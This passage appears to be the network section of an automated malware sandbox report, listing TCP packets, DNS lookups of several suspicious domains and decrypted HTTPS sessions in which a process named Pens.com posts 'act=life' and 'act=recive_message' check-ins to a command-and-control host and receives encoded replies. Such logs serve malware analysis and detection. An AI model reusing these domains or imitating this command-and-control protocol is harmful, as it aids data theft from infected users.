Dec 29, 2024 17:56:16.063720942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.063764095 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.066137075 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.066150904 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.066200018 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.066205978 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.066246033 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.069336891 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.069353104 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.069392920 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.069396973 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.069430113 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.069451094 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.247754097 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.247770071 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.247829914 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.247843027 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.247884035 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.250307083 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.250323057 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.250386953 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.250397921 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.250436068 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.252804995 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.252820015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.252873898 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.252883911 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.252921104 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.255872965 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.255887032 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.255947113 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.255954027 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.255995035 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.272284985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.272300005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.272371054 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.272381067 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.272423029 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.272423983 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.272434950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.272475004 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.275329113 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.275343895 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.275397062 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.275405884 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.275439024 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.277808905 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.277826071 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.277880907 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.277893066 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.277932882 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.280318975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.280334949 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.280390024 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.280401945 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.280438900 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.459161043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.459177971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.459237099 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.459254026 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.459306002 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.461666107 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.461684942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.461726904 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.461733103 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.461771965 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.464788914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.464802980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.464855909 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.464862108 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.464910984 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.467240095 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.467255116 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.467303991 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.467310905 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.467351913 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.482952118 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.482969999 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.483042955 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.483055115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.483092070 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.485651016 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.485673904 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.485701084 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.485706091 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.485733032 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.485755920 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.488178015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.488192081 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.488234043 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.488240957 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.488270998 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.488290071 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.491293907 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.491307974 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.491338015 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.491344929 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.491370916 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.491377115 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.669797897 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.669814110 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.669929028 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.669939995 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.670038939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.672363043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.672377110 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.672434092 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.672440052 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.672478914 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.675436020 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.675471067 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.675501108 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.675506115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.675545931 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.677941084 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.677956104 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.678025007 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.678030968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.678088903 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.693567991 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.693589926 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.693671942 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.693694115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.693741083 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.696233988 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.696249962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.696320057 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.696326971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.696362972 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.698839903 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.698873043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.698895931 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.698900938 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.698944092 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.701939106 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.701952934 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.701986074 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.701992035 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.702012062 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.702025890 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.880345106 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.880363941 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.880448103 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.880459070 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.880500078 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.883536100 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.883549929 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.883610010 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.883615971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.883652925 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.885329008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.885369062 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.885394096 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.885412931 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.885449886 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.898442030 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.898463964 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.898475885 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.898482084 CET	443	49758	172.67.208.58	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 17:55:00.307300091 CET	60474	53	192.168.2.4	1.1.1.1
Dec 29, 2024 17:55:00.539422989 CET	53	60474	1.1.1.1	192.168.2.4
Dec 29, 2024 17:55:37.419258118 CET	55710	53	192.168.2.4	1.1.1.1
Dec 29, 2024 17:55:37.720916986 CET	53	55710	1.1.1.1	192.168.2.4
Dec 29, 2024 17:55:57.422749996 CET	64289	53	192.168.2.4	1.1.1.1
Dec 29, 2024 17:55:57.804008007 CET	53	64289	1.1.1.1	192.168.2.4
Dec 29, 2024 17:55:59.919346094 CET	49441	53	192.168.2.4	1.1.1.1
Dec 29, 2024 17:56:00.158134937 CET	53	49441	1.1.1.1	192.168.2.4
Dec 29, 2024 17:56:00.504164934 CET	65280	53	192.168.2.4	1.1.1.1
Dec 29, 2024 17:56:00.819987059 CET	53	65280	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 29, 2024 17:55:00.307300091 CET	192.168.2.4	1.1.1.1	0x478	Standard query (0)	lvtyqJYzLeYzcx.lvtyqJYzLeYzcx	A (IP address)	IN (0x0001)	false
Dec 29, 2024 17:55:37.419258118 CET	192.168.2.4	1.1.1.1	0x4035	Standard query (0)	imbibelubmbe.click	A (IP address)	IN (0x0001)	false
Dec 29, 2024 17:55:57.422749996 CET	192.168.2.4	1.1.1.1	0x1ce0	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false
Dec 29, 2024 17:55:59.919346094 CET	192.168.2.4	1.1.1.1	0xb33e	Standard query (0)	klipvumisui.shop	A (IP address)	IN (0x0001)	false
Dec 29, 2024 17:56:00.504164934 CET	192.168.2.4	1.1.1.1	0xf3cb	Standard query (0)	dfgh.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 29, 2024 17:55:00.539422989 CET	1.1.1.1	192.168.2.4	0x478	Name error (3)	lvtyqJYzLeYzcx.lvtyqJYzLeYzcx	none	none	A (IP address)	IN (0x0001)	false
Dec 29, 2024 17:55:37.720916986 CET	1.1.1.1	192.168.2.4	0x4035	No error (0)	imbibelubmbe.click		104.21.42.198	A (IP address)	IN (0x0001)	false
Dec 29, 2024 17:55:37.720916986 CET	1.1.1.1	192.168.2.4	0x4035	No error (0)	imbibelubmbe.click		172.67.165.144	A (IP address)	IN (0x0001)	false
Dec 29, 2024 17:55:57.804008007 CET	1.1.1.1	192.168.2.4	0x1ce0	No error (0)	cegu.shop		185.161.251.21	A (IP address)	IN (0x0001)	false
Dec 29, 2024 17:56:00.158134937 CET	1.1.1.1	192.168.2.4	0xb33e	No error (0)	klipvumisui.shop		172.67.208.58	A (IP address)	IN (0x0001)	false
Dec 29, 2024 17:56:00.158134937 CET	1.1.1.1	192.168.2.4	0xb33e	No error (0)	klipvumisui.shop		104.21.37.128	A (IP address)	IN (0x0001)	false
Dec 29, 2024 17:56:00.819987059 CET	1.1.1.1	192.168.2.4	0xf3cb	Name error (3)	dfgh.online	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

imbibelubmbe.click

cegu.shop

klipvumisui.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	104.21.42.198	443	7716	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Timestamp	Bytes transferred	Direction	Data
2024-12-29 16:55:38 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: imbibelubmbe.click
2024-12-29 16:55:38 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-29 16:55:39 UTC	1123	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 16:55:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dvlu7069ru24f13dnkbmendj9h; expires=Thu, 24 Apr 2025 10:42:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ms31bBz6SlLwNlvChMQAPAkovl21ZcjXIyD3Ei14uWhkGnVJUGH8o6BjU2UWbkpHGZAPUCBzuqrW1YHUgfcyc9vNTST3mK2RQOaypegq3DQ1XfMgbuiL5f%2BmIOCuBbrmlHxKpQs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9b51a619498cec-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1954&rtt_var=740&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1470292&cwnd=209&unsent_bytes=0&cid=5bc0bf9451c8f03e&ts=759&x=0"
2024-12-29 16:55:39 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-29 16:55:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	104.21.42.198	443	7716	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Timestamp	Bytes transferred	Direction	Data
2024-12-29 16:55:40 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: imbibelubmbe.click
2024-12-29 16:55:40 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--psyche&j=aa77e78b6b0dd1b2226e7b799532ab3a
2024-12-29 16:55:41 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 16:55:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mg82dqrn9p15ljggot0kkpnkis; expires=Thu, 24 Apr 2025 10:42:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=39K%2FC3UpkwbR71A5%2FyTe8Ab%2FJAY0gaeAcMaCpNVa2kwoSkHcmaCoiwT37NCiQrOJnf0ojv63d6xLbSLuQEiYa1tfZ7DiPO2h67oiVbLHeFjb4wIbFuHJYLY4BmAGWw5T1QCHZN4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9b51b2dbd6efa9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1778&rtt_var=686&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=982&delivery_rate=1573275&cwnd=151&unsent_bytes=0&cid=12bd14d864cd5f42&ts=814&x=0"
2024-12-29 16:55:41 UTC	242	IN	Data Raw: 33 64 65 30 0d 0a 52 6b 61 30 46 6a 56 59 52 52 57 31 76 6a 4b 54 53 37 47 4a 6c 57 4b 4c 46 2b 41 43 6f 32 61 65 54 69 66 32 79 66 35 43 79 61 4d 39 5a 4d 49 30 44 32 78 70 4e 38 62 62 45 4b 6b 74 30 4f 58 6d 42 36 63 31 67 57 61 42 58 50 67 76 53 34 57 73 30 6d 43 2f 7a 6d 52 38 30 6e 64 5a 4b 79 41 35 6c 39 74 4b 73 58 48 71 38 72 63 48 35 54 58 61 49 4d 59 4d 2f 43 39 4c 6c 4b 69 56 4c 62 6e 50 4a 53 37 59 63 56 30 39 4a 6e 48 55 30 6c 2f 32 4c 74 54 6f 2f 77 7a 69 65 6f 68 76 67 55 71 38 4b 31 33 55 38 39 77 50 72 4e 63 6e 43 39 56 6c 58 6e 6f 34 4f 63 36 63 56 2f 31 70 69 36 76 30 42 2b 6c 37 68 6d 62 49 44 76 59 6d 51 35 57 74 6c 44 4b 67 78 53 34 75 31 6e 4a 63 4e 79 39 6c 32 64 68 59 2f 53 6a 65 36 4c 64 4f Data Ascii: 3de0Rka0FjVYRRW1vjKTS7GJlWKLF+ACo2aeTif2yf5CyaM9ZMI0D2xpN8bbEKkt0OXmB6c1gWaBXPgvS4Ws0mC/zmR80ndZKyA5l9tKsXHq8rcH5TXaIMYM/C9LlKiVLbnPJS7YcV09JnHU0l/2LtTo/wzieohvgUq8K13U89wPrNcnC9VlXno4Oc6cV/1pi6v0B+l7hmbIDvYmQ5WtlDKgxS4u1nJcNy9l2dhY/Sje6LdO
2024-12-29 16:55:41 UTC	1369	IN	Data Raw: 71 58 4b 61 49 4a 6c 45 72 78 35 47 68 62 71 4a 4c 62 76 48 5a 44 75 59 62 52 63 39 4b 7a 65 50 6e 46 6a 39 4a 39 62 6f 2b 41 66 6f 64 5a 42 76 77 51 66 30 4a 45 47 65 70 4a 4d 76 70 63 73 6a 4c 4e 39 7a 57 44 30 76 63 64 6a 66 45 4c 39 70 31 50 4f 33 57 4b 6c 56 6b 6d 50 43 45 50 45 39 42 59 76 6c 68 57 43 73 7a 57 52 38 6c 6e 4a 5a 4f 79 70 33 78 64 52 62 2b 69 7a 42 34 50 34 4e 35 48 57 50 61 73 34 48 2f 43 74 50 6e 71 53 57 4a 4b 62 4d 49 69 54 57 4e 42 6c 36 49 47 2b 58 68 42 44 53 4c 4d 50 73 2b 78 61 72 54 38 4a 2f 6a 78 32 38 4b 30 6e 55 38 39 77 6f 72 73 49 6e 4c 39 6c 33 58 7a 45 31 64 38 58 61 58 66 51 37 31 65 37 35 43 75 70 6e 69 47 37 48 42 2f 55 6e 54 4a 47 73 6d 47 44 6c 67 53 4d 38 6c 69 77 58 47 79 70 38 32 39 5a 48 38 57 6e 4d 70 65 35 Data Ascii: qXKaIJlErx5GhbqJLbvHZDuYbRc9KzePnFj9J9bo+AfodZBvwQf0JEGepJMvpcsjLN9zWD0vcdjfEL9p1PO3WKlVkmPCEPE9BYvlhWCszWR8lnJZOyp3xdRb+izB4P4N5HWPas4H/CtPnqSWJKbMIiTWNBl6IG+XhBDSLMPs+xarT8J/jx28K0nU89worsInL9l3XzE1d8XaXfQ71e75CupniG7HB/UnTJGsmGDlgSM8liwXGyp829ZH8WnMpe5
2024-12-29 16:55:41 UTC	1369	IN	Data Raw: 6d 72 48 43 2f 45 67 42 64 72 72 6d 7a 6a 72 6d 57 51 4f 31 57 42 55 4d 47 56 43 31 4e 4a 65 39 6a 2b 54 39 4c 6b 5a 71 58 4b 4f 49 4a 6c 45 38 53 31 4e 6b 72 6d 54 4c 61 6a 50 4b 69 76 54 65 31 38 36 4a 33 72 53 32 46 76 36 4b 74 37 76 35 51 72 70 66 59 64 68 79 77 36 38 59 67 57 54 73 39 78 34 36 2f 41 7a 4c 35 52 42 56 44 51 70 63 4d 47 63 54 37 38 77 6b 2b 7a 37 51 4c 45 31 6a 32 6a 45 41 66 4d 74 54 35 71 75 6c 69 79 6a 7a 79 63 32 32 58 42 58 4e 69 39 39 32 74 4a 55 2b 53 44 59 34 50 45 41 36 48 2f 43 4c 6f 45 44 35 47 77 64 31 4a 2b 62 4c 4b 62 4f 5a 68 48 56 65 6c 6b 39 4d 54 66 49 6b 6b 6d 78 4c 74 2b 72 72 30 44 6c 66 49 4a 72 79 77 44 38 4b 30 69 52 71 4a 73 6a 70 73 59 75 4b 74 46 77 57 7a 4d 71 63 64 66 62 56 50 51 37 31 75 4c 37 44 4b 6b 37 Data Ascii: mrHC/EgBdrrmzjrmWQO1WBUMGVC1NJe9j+T9LkZqXKOIJlE8S1NkrmTLajPKivTe186J3rS2Fv6Kt7v5QrpfYdhyw68YgWTs9x46/AzL5RBVDQpcMGcT78wk+z7QLE1j2jEAfMtT5quliyjzyc22XBXNi992tJU+SDY4PEA6H/CLoED5Gwd1J+bLKbOZhHVelk9MTfIkkmxLt+rr0DlfIJrywD8K0iRqJsjpsYuKtFwWzMqcdfbVPQ71uL7DKk7
2024-12-29 16:55:41 UTC	1369	IN	Data Raw: 75 79 4e 51 57 54 70 39 78 34 36 38 67 74 4e 74 68 36 58 6a 63 68 66 39 44 53 58 66 6f 76 32 4f 7a 77 42 75 52 39 6a 32 58 43 42 66 67 6d 56 35 65 67 6c 69 32 68 67 57 70 6b 30 57 77 58 59 6d 64 51 32 2f 56 41 36 6a 76 46 71 2b 68 4f 38 44 57 46 62 49 46 63 76 43 39 4b 6e 61 53 55 4b 4b 54 4f 49 43 72 51 63 6c 6f 2f 4b 48 33 46 31 46 37 38 49 74 7a 67 35 51 44 6b 63 59 35 6b 79 51 2f 32 62 41 76 55 72 49 52 67 38 34 45 52 4b 64 6c 30 56 43 78 6e 61 4a 6e 46 45 50 59 6c 6b 37 4f 33 44 4f 64 31 6a 57 7a 4e 44 2f 51 74 53 5a 71 73 6d 53 6d 6a 79 54 59 6c 30 6e 78 57 4e 43 68 32 30 39 6c 56 39 53 37 58 37 66 68 41 70 7a 57 46 65 49 46 63 76 41 4e 69 6f 65 6d 39 47 75 76 65 61 6a 32 57 63 31 74 36 66 7a 66 62 33 31 7a 35 4a 74 58 69 2b 77 72 67 66 6f 35 72 78 Data Ascii: uyNQWTp9x468gtNth6Xjchf9DSXfov2OzwBuR9j2XCBfgmV5egli2hgWpk0WwXYmdQ2/VA6jvFq+hO8DWFbIFcvC9KnaSUKKTOICrQclo/KH3F1F78Itzg5QDkcY5kyQ/2bAvUrIRg84ERKdl0VCxnaJnFEPYlk7O3DOd1jWzND/QtSZqsmSmjyTYl0nxWNCh209lV9S7X7fhApzWFeIFcvANioem9Guveaj2Wc1t6fzfb31z5JtXi+wrgfo5rx
